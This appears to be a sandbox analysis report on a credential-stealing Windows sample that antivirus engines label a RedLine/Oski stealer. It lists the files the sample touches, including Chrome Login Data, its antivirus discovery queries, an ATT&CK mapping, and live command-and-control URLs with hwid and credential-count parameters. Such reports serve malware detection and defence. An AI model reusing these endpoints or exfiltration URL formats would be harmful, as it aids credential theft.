                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Zip.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeQueries volume information: C:\Users\user\AppData\Local\Temp\update_232309.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeQueries volume information: C:\Users\user\AppData\Local\Temp\update_232309.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5VXh2VBmA0.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: 5VXh2VBmA0.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 5VXh2VBmA0.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts21
                    Windows Management Instrumentation
                    1
                    Registry Run Keys / Startup Folder
                    11
                    Process Injection
                    11
                    Masquerading
                    1
                    OS Credential Dumping
                    131
                    Security Software Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Registry Run Keys / Startup Folder
                    1
                    Disable or Modify Tools
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    Exfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion
                    Security Account Manager31
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Software Packing
                    Cached Domain Credentials1
                    System Network Configuration Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                    System Information Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    5VXh2VBmA0.exe81%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer
                    5VXh2VBmA0.exe61%VirustotalBrowse
                    5VXh2VBmA0.exe100%AviraTR/Redcap.vxffz
                    5VXh2VBmA0.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\Zip.exe100%AviraTR/Redcap.vxffz
                    C:\Users\user\AppData\Local\Temp\Zip.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\Zip.exe77%ReversingLabsByteCode-MSIL.Trojan.Oskistelaer
                    SourceDetectionScannerLabelLinkDownload
                    0.0.5VXh2VBmA0.exe.760000.0.unpack100%AviraTR/Redcap.vxffzDownload File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://support.google.0%URL Reputationsafe
                    http://ip-api.comx0%URL Reputationsafe
                    http://james.newtonking.com/projects/json0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://panel.cheater-zone.com0%Avira URL Cloudsafe
                    http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=00%Avira URL Cloudsafe
                    http://panel.cheater-zone.com80%Avira URL Cloudsafe
                    http://panel.cheater-zone.com/task.php?hwid=CH65FCCAB88D0%Avira URL Cloudsafe
                    http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFil0%Avira URL Cloudsafe
                    http://ip-api.com80%Avira URL Cloudsafe
                    https://gomorrah.pw0%Avira URL Cloudsafe
                    http://panel.cheater-zone.com/gate.php?hwid=CH65FCCAB88D0%Avira URL Cloudsafe
                    http://panel.cheater-zone.comx0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      panel.cheater-zone.com
                      92.249.45.113
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0true
                        • Avira URL Cloud: safe
                        unknown
                        http://ip-api.com/json/false
                          high
                          http://panel.cheater-zone.com/task.php?hwid=CH65FCCAB88Dtrue
                          • Avira URL Cloud: safe
                          unknown
                          http://panel.cheater-zone.com/gate.php?hwid=CH65FCCAB88Dtrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtab5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersG5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bThe5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://search.yahoo.com?fr=crmas_sfpf5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.tiro.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://support.google.com/chrome?p=update_errorFix5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.goodfont.co.kr5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://ip-api.com8Zip.exe, 0000000A.00000002.375551818.00000176E61FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://support.google.com/chrome/answer/6315198?product=5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                              high
                                              http://www.sajatypeworks.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.typography.netD5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.founder.com.cn/cn/cThe5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/staff/dennis.htm5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://fontfabrik.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://panel.cheater-zone.com85VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                high
                                                https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                  high
                                                  http://panel.cheater-zone.com5VXh2VBmA0.exefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.google.com/intl/en_uk/chrome/5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                    high
                                                    http://ip-api.com5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000003145000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61F0000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E61B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/DPlease5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fonts.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sandoll.co.kr5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.urwpp.deDPlease5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.zhongyicts.com.cn5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.google.com/chrome?p=update_error5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                          high
